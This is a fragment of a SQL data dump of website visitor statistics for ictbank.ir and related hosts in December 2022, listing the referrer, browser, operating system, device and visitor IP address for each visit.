(26556,'2022-12-11','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','107.150.121.143','000',0,1,0),
(26557,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.25','000',0,3,0),
(26558,'2022-12-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(26559,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,14,0),
(26560,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','76.164.198.173','000',0,5,0),
(26561,'2022-12-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(26562,'2022-12-11','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','168.91.85.80','000',0,1,0),
(26563,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,12,0),
(26564,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.141.255','000',0,2,0),
(26565,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.58','000',0,5,0),
(26566,'2022-12-11','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,2,0),
(26567,'2022-12-11','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(26568,'2022-12-11','http://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,2,0),
(26569,'2022-12-11','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,2,0),
(26570,'2022-12-11','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(26571,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,8,0),
(26572,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','23.229.104.2','000',0,2,0),
(26573,'2022-12-11','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26574,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,1,0),
(26575,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,1,0),
(26576,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.244.141.47','000',0,1,0),
(26577,'2022-12-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','58.19.56.207','000',0,1,0),
(26578,'2022-12-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','123.245.24.148','000',0,1,0),
(26579,'2022-12-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','218.95.226.188','000',0,1,0),
(26580,'2022-12-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','123.160.232.28','000',0,1,0),
(26581,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,1,0),
(26582,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.47','000',0,2,0),
(26583,'2022-12-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(26584,'2022-12-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26585,'2022-12-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(26586,'2022-12-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26587,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,8,0),
(26588,'2022-12-11','http://ictbank.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','35.203.245.146','000',0,1,0),
(26589,'2022-12-11','http://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.220.101.51','000',0,1,0),
(26590,'2022-12-11','http://ictbank.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.232.243','000',0,1,0),
(26591,'2022-12-11','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.189','000',0,2,0),
(26592,'2022-12-11','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','163.116.168.119','000',0,1,0),
(26593,'2022-12-11','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','101.35.239.216','000',0,6,0),
(26594,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','95.25.71.106','000',0,1,0),
(26595,'2022-12-11','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(26596,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','34.221.41.255','000',0,1,0),
(26597,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','217.114.218.29','000',0,1,0),
(26598,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','204.101.161.19','000',0,3,0),
(26599,'2022-12-11','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','164.92.212.136','000',0,4,0),
(26600,'2022-12-11','http://ictbank.ir/blog','Chromium','Ubuntu','68.0.0.0','desktop','Unknown','','121.46.142.244','000',0,1,0),
(26601,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','185.181.115.233','000',0,1,0),
(26602,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','176.126.74.93','000',0,1,0),
(26603,'2022-12-11','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','176.126.74.95','000',0,1,0),
(26604,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.71','000',0,4,0),
(26605,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.212','000',0,2,0),
(26606,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.6','000',0,2,0),
(26607,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.164','000',0,2,0),
(26608,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.145','000',0,2,0),
(26609,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.151','000',0,2,0),
(26610,'2022-12-11','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','69.165.14.193','000',0,1,0),
(26611,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.68','000',0,2,0),
(26612,'2022-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.19','000',0,2,0),
(26613,'2022-12-11','https://www.google.com/','Chrome','OS X','108.0.0.0','desktop','Macintosh','','176.234.217.20','000',0,1,0),
(26614,'2022-12-11','http://design-arena.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','88.198.65.172','000',0,2,0),
(26615,'2022-12-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(26616,'2022-12-12','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(26617,'2022-12-12','http://45.92.94.221/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','45.142.192.9','000',0,2,0),
(26618,'2022-12-12','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','78.153.130.91','000',0,2,0),
(26619,'2022-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.228','000',0,2,0),
(26620,'2022-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.109','000',0,2,0),
(26621,'2022-12-12','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26622,'2022-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.161','000',0,2,0),
(26623,'2022-12-12','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.184.240','000',0,2,0),
(26624,'2022-12-12','http://ictbank.ir/blog','Chrome','Windows','53.0.0.0','desktop','Unknown','','3.91.90.242','000',0,2,0),
(26625,'2022-12-12','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26626,'2022-12-12','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26627,'2022-12-12','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(26628,'2022-12-12','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','217.39.83.193','000',0,1,0),
(26629,'2022-12-12','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(26630,'2022-12-12','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.231','000',0,1,0),
(26631,'2022-12-12','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','83.30.154.29','000',0,1,0),
(26632,'2022-12-12','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','66.102.9.103','000',0,1,0),
(26633,'2022-12-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(26634,'2022-12-12','http://ns10.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.83','000',0,1,0),
(26635,'2022-12-12','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.13.58.163','000',0,1,0),
(26636,'2022-12-12','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26637,'2022-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.42','000',0,2,0),
(26638,'2022-12-12','http://wikisonnati.com/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(26639,'2022-12-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26640,'2022-12-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.218.44','000',0,1,0),
(26641,'2022-12-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(26642,'2022-12-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26643,'2022-12-12','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26644,'2022-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(26645,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','164.68.106.210','000',0,1,0),
(26646,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.237','000',0,1,0),
(26647,'2022-12-13','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.120','000',0,1,0),
(26648,'2022-12-13','http://design-arena.ir/blog','Firefox','Unknown','.','desktop','Unknown','','142.93.105.127','000',0,2,0),
(26649,'2022-12-13','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(26650,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26651,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','176.100.243.133','000',0,1,0),
(26652,'2022-12-13','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','81.0.219.240','000',0,2,0),
(26653,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26654,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(26655,'2022-12-13','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.26','000',0,8,0),
(26656,'2022-12-13','http://ictbank.ir/blog','Chromium','Ubuntu','68.0.0.0','desktop','Unknown','','121.46.142.244','000',0,1,0),
(26657,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(26658,'2022-12-13','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','8.2.209.255','000',0,1,0),
(26659,'2022-12-13','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','8.2.209.251','000',0,1,0),
(26660,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','81.161.59.17','000',0,2,0),
(26661,'2022-12-13','http://DESIGN-ARENA.IR/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,4,0),
(26662,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','104.222.43.187','000',0,2,0),
(26663,'2022-12-13','http://ictbank.ir/blog','Firefox','Windows','1.0.0','desktop','Unknown','','52.58.51.176','000',0,2,0),
(26664,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','176.126.74.239','000',0,2,0),
(26665,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','192.30.83.253','000',0,2,0),
(26666,'2022-12-13','http://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','192.30.83.173','000',0,2,0),
(26667,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','104.0.0.0','desktop','Unknown','','89.248.171.23','000',0,2,0),
(26668,'2022-12-13','http://design-arena.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','90.187.238.157','000',0,2,0),
(26669,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','212.119.227.176','000',0,2,0),
(26670,'2022-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','83.175.118.162','000',0,2,0),
(26671,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.171.187.177','000',0,2,0),
(26672,'2022-12-13','http://ictbank.ir/blog','Firefox','Windows','41.0','desktop','Unknown','','169.62.105.58','000',0,1,0),
(26673,'2022-12-13','http://ictbank.ir/blog','Firefox','Windows','41.0','desktop','Unknown','','158.177.250.156','000',0,1,0),
(26674,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.218.115.98','000',0,2,0),
(26675,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','83.135.202.145','000',0,2,0),
(26676,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(26677,'2022-12-13','http://ictbank.ir/blog','Firefox','OS X','58.0','desktop','Macintosh','','93.119.227.91','000',0,2,0),
(26678,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','62.204.41.33','000',0,6,0),
(26679,'2022-12-13','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','42.236.10.114','000',0,1,0),
(26680,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','204.101.161.19','000',0,4,0),
(26681,'2022-12-13','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','193.128.111.103','000',0,1,0),
(26682,'2022-12-13','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','193.128.111.106','000',0,1,0),
(26683,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.250','000',0,4,0),
(26684,'2022-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,4,0),
(26685,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.57','000',0,4,0),
(26686,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.149','000',0,4,0),
(26687,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.85','000',0,4,0),
(26688,'2022-12-13','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','181.214.218.69','000',0,2,0),
(26689,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.92','000',0,4,0),
(26690,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.198','000',0,4,0),
(26691,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.64','000',0,4,0),
(26692,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.197','000',0,4,0),
(26693,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.58.194','000',0,1,0),
(26694,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.244','000',0,4,0),
(26695,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.158','000',0,4,0),
(26696,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.2','000',0,4,0),
(26697,'2022-12-13','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,6,0),
(26698,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(26699,'2022-12-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','104.222.43.212','000',0,4,0),
(26700,'2022-12-13','https://www.bing.com/','Edge','Windows','108.0.0.0','desktop','Unknown','','63.235.177.5','000',0,1,0),
(26701,'2022-12-13','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','18.210.27.222','000',0,1,0),
(26702,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','192.71.2.171','000',0,1,0),
(26703,'2022-12-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(26704,'2022-12-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26705,'2022-12-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26706,'2022-12-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26707,'2022-12-13','http://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(26708,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','199.195.249.149','000',0,2,0),
(26709,'2022-12-13','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','83.30.154.29','000',0,1,0),
(26710,'2022-12-13','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','66.102.9.103','000',0,1,0),
(26711,'2022-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(26712,'2022-12-13','http://ictbank.ir/blog','Chrome','Windows','5.0.0.0','desktop','Unknown','','93.157.100.49','000',0,1,0),
(26713,'2022-12-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.28.202.40','000',0,2,0),
(26714,'2022-12-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,2,0),
(26715,'2022-12-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,4,0),
(26716,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','162.247.74.74','000',0,1,0),
(26717,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','104.244.75.33','000',0,1,0),
(26718,'2022-12-14','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26719,'2022-12-14','http://design-arena.ir/blog','Chrome','Windows','40.0.0.0','desktop','Unknown','','38.130.107.22','000',0,6,0),
(26720,'2022-12-14','http://design-arena.ir/blog','Chrome','Windows','40.0.0.0','desktop','Unknown','','38.130.107.54','000',0,6,0),
(26721,'2022-12-14','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(26722,'2022-12-14','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,7,0),
(26723,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,1,0),
(26724,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.83','000',0,1,0),
(26725,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','179.243.167.234','000',0,9,0),
(26726,'2022-12-14','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26727,'2022-12-14','http://ictbank.ir/blog','Safari','OS X','11.0.0','desktop','Macintosh','','69.4.89.106','000',0,2,0),
(26728,'2022-12-14','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,3,0),
(26729,'2022-12-14','http://ictbank.ir/blog','Chrome','Android','84.0.0.0','mobile:smart','Galaxy J7 Prime','','208.100.26.231','000',0,2,0),
(26730,'2022-12-14','http://www.wikisonnati.com/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,2,0),
(26731,'2022-12-14','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(26732,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','45.64.162.158','000',0,1,0),
(26733,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.249.81.107','000',0,1,0),
(26734,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.224.192','000',0,2,0),
(26735,'2022-12-14','http://ictbank.ir/blog','Firefox','Windows','29.0','desktop','Unknown','','128.199.119.127','000',0,7,0),
(26736,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(26737,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.37.219.244','000',0,2,0),
(26738,'2022-12-14','http://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','69.4.87.74','000',0,2,0),
(26739,'2022-12-14','http://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','3.131.152.253','000',0,3,0),
(26740,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','187.62.84.138','000',0,1,0),
(26741,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.249.85.111','000',0,1,0),
(26742,'2022-12-14','http://ictbank.ir/blog','Chrome','Android','59.0.0.0','mobile:smart','Galaxy S7','','93.119.227.19','000',0,2,0),
(26743,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26744,'2022-12-14','http://ictbank.ir/blog','Firefox','Windows','84.0','desktop','Unknown','','192.64.117.208','000',0,5,0),
(26745,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.209.40.229','000',0,1,0),
(26746,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','82.146.44.11','000',0,3,0),
(26747,'2022-12-14','https://www.bing.com/','Chrome','Windows','106.0.0.0','desktop','Unknown','','63.73.199.69','000',0,1,0),
(26748,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','59.50.182.166','000',0,1,0),
(26749,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','222.94.140.113','000',0,1,0),
(26750,'2022-12-14','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','222.94.140.141','000',0,1,0),
(26751,'2022-12-14','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','180.95.231.170','000',0,1,0),
(26752,'2022-12-14','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.67','000',0,6,0),
(26753,'2022-12-14','http://ictbank.ir/blog','Chrome','Windows','61.0.0.0','desktop','Unknown','','167.114.45.98','000',0,5,0),
(26754,'2022-12-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(26755,'2022-12-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.177.129','000',0,1,0),
(26756,'2022-12-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(26757,'2022-12-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26758,'2022-12-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(26759,'2022-12-14','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26760,'2022-12-15','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26761,'2022-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(26762,'2022-12-15','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','62.171.177.111','000',0,2,0),
(26763,'2022-12-15','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.202','000',0,1,0),
(26764,'2022-12-15','http://ictbank.ir/blog','Chrome','Windows','34.0.0.0','desktop','Unknown','','144.168.162.250','000',0,2,0),
(26765,'2022-12-15','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','206.189.122.212','000',0,2,0),
(26766,'2022-12-15','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26767,'2022-12-15','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,2,0),
(26768,'2022-12-15','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','65.21.206.43','000',0,2,0),
(26769,'2022-12-15','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.73','000',0,2,0),
(26770,'2022-12-15','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','77.174.15.20','000',0,1,0),
(26771,'2022-12-15','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.10.138.96','000',0,2,0),
(26772,'2022-12-15','http://design-arena.ir','Chrome','Windows','87.0.0.0','desktop','Unknown','','144.172.73.16','000',0,2,0),
(26773,'2022-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
